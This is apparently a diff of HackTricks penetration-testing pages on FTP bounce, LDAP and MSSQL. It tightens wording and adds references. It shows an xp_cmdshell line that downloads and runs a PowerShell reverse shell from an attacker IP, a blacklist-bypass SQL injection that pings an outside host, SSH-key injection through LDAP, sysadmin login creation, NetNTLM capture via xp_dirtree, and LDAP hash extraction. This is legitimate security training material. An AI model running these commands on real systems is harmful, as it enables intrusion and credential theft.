-- **`RETR /path/to/file`** A passive or a port connection must be establish. Then, the FTP server will send the indicated file through that connection
-- **`REST 6`** This will indicate the server that next time it send something using `RETR` it should start in the 6th byte.
+- **`STOU /path/something.txt`** stores the uploaded data under a unique server-generated filename.
+- **`RETR /path/to/file`** requires an established active or passive data connection, through which the server sends the requested file.
+- **`REST 6`** tells the server that the next `RETR` transfer should resume at byte offset 6.
 - **`TYPE i`** Set transfer to binary
-- **`PASV`** This will open a passive connection and will indicate the user were he can connects
+- **`PASV`** asks the server to listen for a passive data connection and return the address and port to the client.
 - **`PUT /tmp/file.txt`** Upload indicated file to the FTP
 
 ![FTP root mapped to webroot (XAMPP) - Some FTP commands: PUT /tmp/file.txt Upload indicated file to the FTP](<../../images/image (386).png>)
 
 ## FTPBounce attack
 
-Some FTP servers allow the command PORT. This command can be used to indicate to the server that you wants to connect to other FTP server at some port. Then, you can use this to scan which ports of a host are open through a FTP server.
+Some FTP servers allow the `PORT` command to specify an arbitrary destination for the server's data connection. This behavior can be abused to scan a host's ports through the FTP server.
 
 [**Learn here how to abuse a FTP server to scan ports.**](ftp-bounce-attack.md)
 
@@ -242,10 +242,10 @@ The theory is easy:
 
 1. **Upload the request (inside a text file) to the vulnerable server.** Remember that if you want to talk with another HTTP or FTP server you need to change lines with `0x0d 0x0a`
 2. **Use `REST X` to avoid sending the characters you don't want to send** (maybe to upload the request inside the file you needed to put some image header at the beginning)
-3. **Use `PORT`to connect to the arbitrary server and service**
-4. **Use `RETR`to send the saved request to the server.**
+3. **Use `PORT` to connect to the arbitrary server and service.**
+4. **Use `RETR` to send the saved request to the server.**
 
-Its highly probably that this **will throw an error like** _**Socket not writable**_ **because the connection doesn't last enough to send the data with `RETR`**. Suggestions to try to avoid that are:
+This will probably return an error such as _**Socket not writable**_ because the connection may not remain open long enough for `RETR` to send the data. Possible workarounds include:
 
 - If you are sending an HTTP request, **put the same request one after another** until **\~0.5MB** at least. Like this:
 
@@ -352,6 +352,7 @@ Entry_7:
 - [4] [NVD - CVE-2025-47812](https://nvd.nist.gov/vuln/detail/CVE-2025-47812)
 - [5] [Wing FTP help - User / Group settings](https://www.wftpserver.com/help/ftpserver/index.html?user__group.htm)
 - [6] [What is FTP bounce attack?](https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/)
+- [7] [RFC 959 – File Transfer Protocol](https://www.rfc-editor.org/rfc/rfc959)
+- [8] [Mozilla Security Blog – Stopping FTP support in Firefox 90](https://blog.mozilla.org/security/2021/07/20/stopping-ftp-support-in-firefox-90/)
 
 {{#include ../../banners/hacktricks-training.md}}
-

--- a/src/network-services-pentesting/pentesting-ldap.md
+++ b/src/network-services-pentesting/pentesting-ldap.md
@@ -2,13 +2,13 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-The use of **LDAP** (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.
+**LDAP** (Lightweight Directory Access Protocol) provides access to directory services: clients can search, read, add, modify, and delete directory entries when access controls permit it. Common deployments store identities, groups, devices, and service configuration. LDAP was designed as a lighter-weight way to access directory models derived from X.500.<sup>[[6]](#references)[[7]](#references)</sup>
 
-LDAP directories are structured to allow their distribution across several servers, with each server housing a **replicated** and **synchronized** version of the directory, referred to as a Directory System Agent (DSA). Responsibility for handling requests lies entirely with the LDAP server, which may communicate with other DSAs as needed to deliver a unified response to the requester.
+An LDAP server is also called a Directory System Agent (DSA). A directory can be partitioned into naming contexts and distributed or replicated across DSAs, but not every server necessarily contains a synchronized copy of the entire tree. A DSA may return referrals when another server holds the requested data.<sup>[[6]](#references)[[7]](#references)</sup>
 
-The LDAP directory's organization resembles a **tree hierarchy, starting with the root directory at the top**. This branches down to countries, which further divide into organizations, and then to organizational units representing various divisions or departments, finally reaching the individual entities level, including both people and shared resources like files and printers.
+Entries form a **Directory Information Tree (DIT)** and are identified by Distinguished Names (DNs). A deployment may use DNS-style domain components (`dc=example,dc=com`), country/organization components, organizational units, or another schema-appropriate hierarchy; there is no requirement that every tree follow a country → organization pattern.<sup>[[6]](#references)</sup>
 
-**Default port:** 389 and 636(ldaps). Global Catalog (LDAP in ActiveDirectory) is available by default on ports 3268, and 3269 for LDAPS.
+**Common ports:** TCP 389 for LDAP (optionally upgraded with StartTLS) and TCP 636 for LDAP over TLS (`ldaps`). On an Active Directory domain controller that is also a Global Catalog server, TCP 3268 provides Global Catalog LDAP and TCP 3269 provides Global Catalog LDAP over TLS.<sup>[[8]](#references)</sup>
 
 ```
 PORT    STATE SERVICE REASON
@@ -30,33 +30,32 @@ dc: moneycorp
 objectClass: dcObject
 objectClass: organization
 
-dn ou=it,dc=moneycorp,dc=local
+dn: ou=it,dc=moneycorp,dc=local
 objectClass: organizationalUnit
-ou: dev
+ou: it
 
 dn: ou=marketing,dc=moneycorp,dc=local
 objectClass: organizationalUnit
-Ou: sales
+ou: marketing
 
-dn: cn= ,ou= ,dc=moneycorp,dc=local
-objectClass: personalData
-cn:
-sn:
-gn:
-uid:
-ou:
+dn: uid=pepe,ou=it,dc=moneycorp,dc=local
+objectClass: inetOrgPerson
+cn: Pepe Example
+sn: Example
+givenName: Pepe
+uid: pepe
 mail: pepe@hacktricks.xyz
-phone: 23627387495
+telephoneNumber: 23627387495
 ```
 
 - Lines 1-3 define the top level domain local
 - Lines 5-8 define the first level domain moneycorp (moneycorp.local)
-- Lines 10-16 define 2 organizational units: dev and sales
-- Lines 18-26 create an object of the domain and assign attributes with values
+- Lines 10-16 define two organizational units: `it` and `marketing`.
+- The final record creates a person entry and assigns schema-valid attributes.
 
 ## Write data
 
-Note that if you can modify values you could be able to perform really interesting actions. For example, imagine that you **can change the "sshPublicKey" information** of your user or any user. It's highly probable that if this attribute exist, then **ssh is reading the public keys from LDAP**. If you can modify the public key of a user you **will be able to login as that user even if password authentication is not enabled in ssh**.<sup>[[1]](#references)</sup>
+Writable attributes can have security impact beyond the directory itself. For example, if a host is explicitly configured to retrieve SSH authorized keys from LDAP and you can replace a target's `sshPublicKey` attribute, you may be able to authenticate as that user without their password. Confirm the SSH integration and attribute mapping; the mere presence of the attribute does not prove that any host consumes it.<sup>[[1]](#references)</sup>
 
 ```bash
 # Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
@@ -67,7 +66,7 @@ Note that if you can modify values you could be able to perform really interesti
 True
 >>> connection.extend.standard.who_am_i()
 u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
->>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
+>>> connection.modify('uid=USER,ou=USERS,dc=DOMAIN,dc=TLD', {'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
 ```
 
 ## Linux client-side LDAP artifacts
@@ -103,19 +102,19 @@ What to look for:
 - cleartext bind credentials
 - directory-backed SSH or sudo integrations that turn a readable config into real authz impact
 
-## Sniff clear text credentials
+## Cleartext credentials and TLS downgrade risks
 
-If LDAP is used without SSL you can **sniff credentials in plain text** in the network.
+An LDAP **simple bind** over an unprotected connection exposes the bind DN and password to an on-path observer. Not every authentication mechanism is plaintext: SASL mechanisms may provide their own integrity/confidentiality, and StartTLS or `ldaps://` can protect the session.<sup>[[9]](#references)</sup>
 
-Also, you can perform a **MITM** attack in the network **between the LDAP server and the client.** Here you can make a **Downgrade Attack** so the client with use the **credentials in clear text** to login.
+An on-path attacker may be able to suppress or interfere with StartTLS when a client treats TLS as optional and falls back to an unprotected simple bind. A correctly configured client must require TLS before sending credentials and fail closed if negotiation fails.
 
-**If SSL is used** you can try to make **MITM** like the mentioned above but offering a **false certificate**, if the **user accepts it**, you are able to Downgrade the authentication method and see the credentials again.
+For `ldaps://` or successfully negotiated StartTLS, interception additionally requires the client to accept an untrusted or name-mismatched certificate, or compromise of a trusted CA/key. LDAP clients are often unattended services, so certificate validation policy—not an interactive user prompt—is the relevant control.<sup>[[10]](#references)</sup>
 
 ## Anonymous Access
 
 ### Bypass TLS SNI check
 
-According to [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) just by accessing the LDAP server with an arbitrary domain name (like company.com) he was able to contact the LDAP service and extract information as an anonymous user:<sup>[[2]](#references)</sup>
+In the cited environment, resolving an attacker-chosen hostname to the LDAP service changed how the TLS connection was accepted and made an anonymously readable directory reachable. Treat this as a deployment-specific hostname/SNI and certificate-routing check, not a generic LDAP authentication bypass:<sup>[[2]](#references)</sup>
 
 ```bash
 ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
@@ -123,8 +122,7 @@ ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
 
 ### LDAP anonymous binds
 
-[LDAP anonymous binds](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) allow **unauthenticated attackers** to retrieve information from the domain, such as a complete listing of users, groups, computers, user account attributes, and the domain password policy. This is a **legacy configuration**, and as of Windows Server 2003, only authenticated users are permitted to initiate LDAP requests.<sup>[[3]](#references)</sup>\
-However, admins may have needed to **set up a particular application to allow anonymous binds** and given out more than the intended amount of access, thereby giving unauthenticated users access to all objects in AD.<sup>[[3]](#references)</sup>
+An LDAP anonymous bind establishes an unauthenticated authorization state. Active Directory allows limited RootDSE discovery anonymously but, since Windows Server 2003 defaults, generally requires authentication to search directory data. Administrators can deliberately grant broader anonymous access for legacy applications; a mistaken ACL can then expose users, groups, computers, attributes, or policy data.<sup>[[3]](#references)</sup>
 
 ### Anonymous LDAP enumeration with NetExec (null bind)
 
@@ -151,7 +149,7 @@ What to look for:
 - memberOf and OU placement to scope targeted sprays
 - pwdLastSet (temporal patterns), userAccountControl flags (disabled, smartcard required, etc.)
 
-Note: If anonymous bind is not permitted, you’ll typically see an Operations error indicating a bind is required.
+Note: When the requested anonymous search is not permitted, an Operations error indicating that a bind is required is common. Other errors can reflect the base DN, filter, signing/channel-binding policy, or server-specific access controls.
 
 ## Valid Credentials
 
@@ -170,7 +168,7 @@ ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authty
 
 ### Automated
 
-Using this you will be able to see the **public information** (like the domain name)**:**
+These scripts may reveal anonymously accessible metadata such as naming contexts and supported controls:
 
 ```bash
 nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
@@ -182,7 +180,7 @@ nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
 
 <summary>See LDAP enumeration with python</summary>
 
-You can try to **enumerate a LDAP with or without credentials using python**: `pip3 install ldap3`
+You can enumerate an LDAP directory with or without credentials using Python: `pip3 install ldap3`.
 
 First try to **connect without** credentials:
 
@@ -195,7 +193,7 @@ True
 >>> server.info
 ```
 
-If the response is `True` like in the previous example, you can obtain some **interesting data** of the LDAP (like the **naming context** or **domain name**) server from:
+If the bind returns `True`, inspect RootDSE metadata such as naming contexts and supported features. A successful anonymous bind does not imply that subtree searches are authorized.
 
 ```bash
 >>> server.info
@@ -205,7 +203,7 @@ Naming contexts:
 dc=DOMAIN,dc=DOMAIN
 ```
 
-Once you have the naming context you can make some more exciting queries. This simply query should show you all the objects in the directory:
+Once you have a naming context, this subtree query requests all objects the bound identity is allowed to read:
 
 ```bash
 >>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
@@ -233,7 +231,7 @@ python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --c
 # Get groups
 python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
 # Get users
-python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
+python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --users
 # Get Domain Admins
 python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
 # Get Privileged Users
@@ -257,7 +255,7 @@ text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
  tion a successful bind must be completed on the connection., data 0, v3839
 ```
 
-If you find something saying that the "_bind must be completed_" means that the credentials are incorrect.
+An error saying that a successful bind must be completed means the requested operation is not permitted in the current authentication state. Possible causes include invalid credentials, an anonymous/omitted bind, or a server policy requiring signing, channel binding, or a different authentication mechanism.
 
 You can extract **everything from a domain** using:
 
@@ -325,12 +323,12 @@ To see if you have access to any password you can use grep after executing one o
 <ldapsearchcmd...> | grep -i -A2 -B2 "userpas"
 ```
 
-Please, notice that the passwords that you can find here could not be the real ones...
+Values in password-like attributes may be hashes, application-specific secrets, stale data, or decoys rather than current plaintext passwords.
 
 #### pbis
 
 You can download **pbis** from here: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) and it's usually installed in `/opt/pbis`.\
-**Pbis** allow you to get basic information easily:
+**PBIS Open** is now an archived project, but it may still be installed on older LDAP/AD-integrated hosts. Its utilities can expose useful local integration information:
 
 ```bash
 #Read keytab file
@@ -386,7 +384,7 @@ done
 
 You can download a graphical interface with LDAP server here: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html)
 
-By default is is installed in: _/opt/jxplorer_
+By default it may be installed in `/opt/jxplorer`.
 
 ![Apache Directory - jxplorer: By default is is installed in: /opt/jxplorer](<../images/image (482).png>)
 
@@ -406,19 +404,19 @@ Ldapx is a flexible LDAP proxy that can be used to inspect & transform LDAP traf
 
 You can get it from [https://github.com/Macmod/ldapx](https://github.com/Macmod/ldapx).
 
-## Authentication via kerberos
+## Authentication via Kerberos
 
-Using `ldapsearch` you can **authenticate** against **kerberos instead** of via **NTLM** by using the parameter `-Y GSSAPI`
+With a valid Kerberos credential cache and correct service principal/DNS setup, `ldapsearch -Y GSSAPI` uses SASL GSSAPI rather than a simple bind. Whether another invocation uses NTLM depends on the LDAP library and SASL mechanism; `ldapsearch -x` specifically requests simple authentication.
 
-## POST
+## Post-exploitation
 
-If you can access the files where the databases are contained (could be in _/var/lib/ldap_). You can extract the hashes using:
+Legacy OpenLDAP deployments may store Berkeley DB files under `/var/lib/ldap`. If the exact backend uses readable `.bdb` files, this historical string-carving approach may recover password-hash records, but modern `mdb` backends and binary database formats require backend-aware offline tooling or a consistent backup:
 
 ```bash
 cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u
 ```
 
-You can feed john with the password hash (from '{SSHA}' to 'structural' without adding 'structural').
+Extract only the hash value (for example, the string beginning with `{SSHA}`) and select the matching John the Ripper/Hashcat format. Do not append adjacent LDIF or database fields such as `structuralObjectClass`.
 
 ### Configuration Files
 
@@ -495,5 +493,10 @@ Entry_7:
 - [3] [Microsoft: Anonymous LDAP operations to Active Directory are disabled](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled)
 - [4] [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html)
 - [5] [NetExec (CME successor)](https://github.com/Pennyw0rth/NetExec)
+- [6] [RFC 4512 – LDAP Directory Information Models](https://www.rfc-editor.org/rfc/rfc4512)
+- [7] [RFC 4511 – LDAP protocol operations](https://www.rfc-editor.org/rfc/rfc4511)
+- [8] [Microsoft Active Directory LDAP and Global Catalog ports](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/1010e59a-cf64-410c-a05c-a3a6c715261a)
+- [9] [RFC 4513 – LDAP authentication methods and security mechanisms](https://www.rfc-editor.org/rfc/rfc4513)
+- [10] [OpenLDAP 2.6 Administrator's Guide – Using TLS](https://openldap.org/doc/admin26/tls.html)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
+++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
@@ -4,11 +4,7 @@
 
 ## Basic Information
 
-From [wikipedia](https://en.wikipedia.org/wiki/Microsoft_SQL_Server):
-
-> **Microsoft SQL Server** is a **relational database** management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).
-
-**Default port:** 1433
+**Microsoft SQL Server** is Microsoft's relational database management system. The default TCP-enabled instance commonly listens on **1433**, while named instances use dynamic ports by default and may be discovered through SQL Server Browser on UDP/1434. Always enumerate the actual instance and port configuration.<sup>[[20]](#references)</sup>
 
 ```
 1433/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
@@ -16,18 +12,18 @@ From [wikipedia](https://en.wikipedia.org/wiki/Microsoft_SQL_Server):
 
 ### Landing on a Managed Database-as-a-Service (DBaaS)
 
-Everything that depends on "owning the host" (e.g., privilege escalation, lateral movement, and OS command execution) ceases to exist in DBaaS. Pentesting in these environments must pivot to application-layer exploitation, data exfiltration via SQL logic, misconfigured IAM roles, or poor network/VPC design. For example, the [Amazon RDS documentation](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/SQLServer.Concepts.General.FeatureNonSupport.html) explicitly states that `xp_cmdshell` and the `TRUSTWORTHY` database property are not supported.
+In a managed DBaaS, customers normally cannot administer the underlying host, and host-level primitives may be removed or mediated. Focus on SQL authorization, application-layer flaws, data access, cloud IAM/integration roles, backups, and network design. Capabilities differ by product: for example, Amazon RDS for SQL Server does not support `xp_cmdshell` or the `TRUSTWORTHY` database property.<sup>[[21]](#references)</sup>
 
 > [!WARNING]
 > You get a database endpoint, not a server. The cloud provider manages the host OS, the database engine binaries, and many security policies.
 
-### **Default MS-SQL System Tables**
+### SQL Server system databases
 
 - **master Database**: This database is crucial as it captures all system-level details for a SQL Server instance.
 - **msdb Database**: SQL Server Agent utilizes this database to manage scheduling for alerts and jobs.
 - **model Database**: Acts as a blueprint for every new database on the SQL Server instance, where any alterations like size, collation, recovery model, and more are mirrored in newly created databases.
 - **Resource Database**: A read-only database that houses system objects that come with SQL Server. These objects, while stored physically in the Resource database, are logically presented in the sys schema of every database.
-- **tempdb Database**: Serves as a temporary storage area for transient objects or intermediate result sets.
+- **tempdb Database**: Serves as a temporary storage area for transient objects or intermediate result sets.<sup>[[22]](#references)</sup>
 
 ## Enumeration
 
@@ -60,11 +56,11 @@ msf> use auxiliary/admin/mssql/mssql_findandsampledata
 msf> use auxiliary/scanner/mssql/mssql_hashdump
 msf> use auxiliary/scanner/mssql/mssql_schemadump
 
-#Search for insteresting data
+# Search for interesting data
 msf> use auxiliary/admin/mssql/mssql_findandsampledata
 msf> use auxiliary/admin/mssql/mssql_idf
 
-#Privesc
+# Privilege escalation
 msf> use exploit/windows/mssql/mssql_linkcrawler
 msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
 msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin
@@ -148,7 +144,7 @@ mssqlclient.py [-db volume] -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
 sqsh -S <IP> -U <Username> -P <Password> -D <Database>
 ## In case Windows Auth using "." as domain name for local user
 sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
-## In sqsh you need to use GO after writting the query to send it
+## In sqsh, use GO after writing the query to send it
 1> select 1;
 2> go
 ```
@@ -156,43 +152,40 @@ sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
 #### Common Enumeration
 
 ```sql
-# Get version
+-- Get version
 select @@version;
-# Get user
+-- Get user
 select user_name();
-# Get databases
+-- Get databases
 SELECT name FROM master.dbo.sysdatabases;
-# Use database
+-- Use database
 USE master
 
-#Get table names
+-- Get table names
 SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
-#List Linked Servers
+-- List linked servers
 EXEC sp_linkedservers
 SELECT * FROM sys.servers;
-#List users
+-- List logins
 select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
-#Create user with sysadmin privs
+-- Create a login and grant sysadmin (requires sufficient privileges)
 CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
 EXEC sp_addsrvrolemember 'hacker', 'sysadmin'
 
-#Enumerate links
+-- Impacket mssqlclient helper: enumerate links
 enum_links
-#Use a link
+-- Impacket mssqlclient helper: use a link
 use_link [NAME]
 ```
 
-#### Get User
+#### Get users
 
-
-{{#ref}}
-types-of-mssql-users.md
-{{#endref}}
+See [Types of MSSQL users](types-of-mssql-users.md) for the distinction between server logins and database users.
 
 ```sql
-# Get all the users and roles
+-- Get all the users and roles
 select * from sys.database_principals;
-## This query filters a bit the results
+-- This query filters the results
 select name,
        create_date,
        modify_date,
@@ -203,11 +196,13 @@ from sys.database_principals
 where type not in ('A', 'R')
 order by name;
 
-## Both of these select all the users of the current database (not the server).
-## Interesting when you cannot acces the table sys.database_principals
+-- Both select users of the current database, not server logins.
+-- Useful when catalog visibility restricts sys.database_principals.
 EXEC sp_helpuser
 SELECT * FROM sysusers
 ```
+
+Catalog visibility is permission-limited, so a low-privileged user may see only themselves, system users, fixed roles, and principals on which they hold permission.<sup>[[10]](#references)</sup>
 
 #### Get Permissions
 
@@ -221,21 +216,21 @@ SELECT * FROM sysusers
 3. **Principal:** This term refers to the entity that is granted permission to a securable. Principals mainly include logins and database users. The control over access to securables is exercised through the granting or denying of permissions or by including logins and users in roles equipped with access rights.
 
 ```sql
-# Show all different securables names
+-- Show all securable classes
 SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
-# Show all possible permissions in MSSQL
+-- Show all built-in permissions
 SELECT * FROM sys.fn_builtin_permissions(DEFAULT);
-# Get all my permissions over securable type SERVER
+-- Get my permissions over the SERVER securable
 SELECT * FROM fn_my_permissions(NULL, 'SERVER');
-# Get all my permissions over a database
+-- Get my permissions over a database
 USE <database>
 SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
-# Get members of the role "sysadmin"
+-- Get members of the sysadmin role
 Use master
 EXEC sp_helpsrvrolemember 'sysadmin';
-# Get if the current user is sysadmin
+-- Check whether the current login is sysadmin
 SELECT IS_SRVROLEMEMBER('sysadmin');
-# Get users that can run xp_cmdshell
+-- Show explicit permissions recorded for xp_cmdshell
 Use master
 EXEC sp_helprotect 'xp_cmdshell'
 ```
@@ -276,8 +271,8 @@ EXEC master..xp_cmdshell 'whoami'
 # Get Rev shell
 EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'
 
-# Bypass blackisted "EXEC xp_cmdshell"
-'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' —
+# Bypass a blacklist matching the literal "EXEC xp_cmdshell"
+'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' --
 ```
 
 [MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner)
@@ -376,13 +371,7 @@ mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.25
 > EXEC sp_helprotect 'xp_fileexist';
 > ```
 
-Using tools such as **responder** or **Inveigh** it's possible to **steal the NetNTLM hash**.\
-You can see how to use these tools in:
-
-
-{{#ref}}
-../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
-{{#endref}}
+Tools such as **Responder** or **Inveigh** can capture the NTLM challenge-response emitted by the SQL Server service account. This is not the account's NT hash; it is a NetNTLMv1/v2 exchange that may be tested offline or relayed only when the corresponding protocol protections permit it. See [network poisoning and relay attacks](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
 
 #### From NetNTLMv2 capture to MSSQL silver ticket (PAC group injection)
 - Capture the SQL Server service account NetNTLMv2 via `xp_dirtree '\\\\<attacker_ip>\\share'` with Responder (Hashcat mode 5600 to crack).
@@ -407,12 +396,7 @@ KRB5CCNAME=<user_to_impersonate>.ccache mssqlclient.py -no-pass -k <fqdn>
 
 ### Abusing MSSQL trusted Links
 
-[**Read this post**](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **to find more information about how to abuse this feature:**
-
-
-{{#ref}}
-../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md
-{{#endref}}
+See [Abusing Active Directory MSSQL](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) for more linked-server attack paths.
 
 #### Linked-server credential mapping -> remote `sysadmin` -> OS RCE
 
@@ -463,17 +447,17 @@ rlwrap -cAr nc -lnvp 443
 
 ### **Write Files**
 
-To write files using `MSSQL`, we **need to enable** [**Ole Automation Procedures**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option), which requires admin privileges, and then execute some stored procedures to create the file:
+One file-write method is to enable **Ole Automation Procedures** and instantiate `Scripting.FileSystemObject`. Changing the server option requires high privileges, execution additionally depends on stored-procedure permissions, and the destination is limited by the SQL Server service account's filesystem access:
 
-```bash
-# Enable Ole Automation Procedures
+```sql
+-- Enable Ole Automation Procedures
 sp_configure 'show advanced options', 1
 RECONFIGURE
 
 sp_configure 'Ole Automation Procedures', 1
 RECONFIGURE
 
-# Create a File
+-- Create a file
 DECLARE @OLE INT
 DECLARE @FileID INT
 EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
@@ -485,7 +469,7 @@ EXECUTE sp_OADestroy @OLE
 
 ### **Read file with** OPENROWSET
 
-By default, `MSSQL` allows file **read on any file in the operating system to which the account has read access**. We can use the following SQL query:
+With the required bulk-operation permission and SQL Server service-account filesystem access, `OPENROWSET(BULK ...)` can read a local or reachable file:
 
 ```sql
 SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
@@ -494,7 +478,7 @@ SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_C
 However, the **`BULK`** option requires the **`ADMINISTER BULK OPERATIONS`** or the **`ADMINISTER DATABASE BULK OPERATIONS`** permission.<sup>[[12]](#references)</sup>
 
 ```sql
-# Check if you have it
+-- Check whether you have the required bulk permissions
 SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTER BULK OPERATIONS' OR permission_name='ADMINISTER DATABASE BULK OPERATIONS';
 ```
 
@@ -633,21 +617,21 @@ This turns normal-looking embedding traffic into a **database-native C2 transpor
 
 ### **RCE/Read files executing scripts (Python and R)**
 
-MSSQL could allow you to execute **scripts in Python and/or R**. These code will be executed by a **different user** than the one using **xp_cmdshell** to execute commands.
+When SQL Server Machine Learning Services and external script execution are installed and enabled, an authorized principal may run **Python and/or R** through `sp_execute_external_script`. Launchpad executes scripts in a separate security context from `xp_cmdshell`; the exact identity and sandboxing depend on the version and configuration.
 
-Example trying to execute a **'R'** _"Hellow World!"_ **not working**:
+Example of an unavailable or misconfigured **R** “Hello World” execution:
 
-![Error-based vector for SQLi - RCE/Read files executing scripts (Python and R): Example trying to execute a 'R' "Hellow World!" not working](<../../images/image (393).png>)
+![Error-based vector for SQLi - RCE/read files by executing scripts (Python and R): example showing a failed R "Hello World!" execution](<../../images/image (393).png>)
 
 Example using configured python to perform several actions:
 
 ```sql
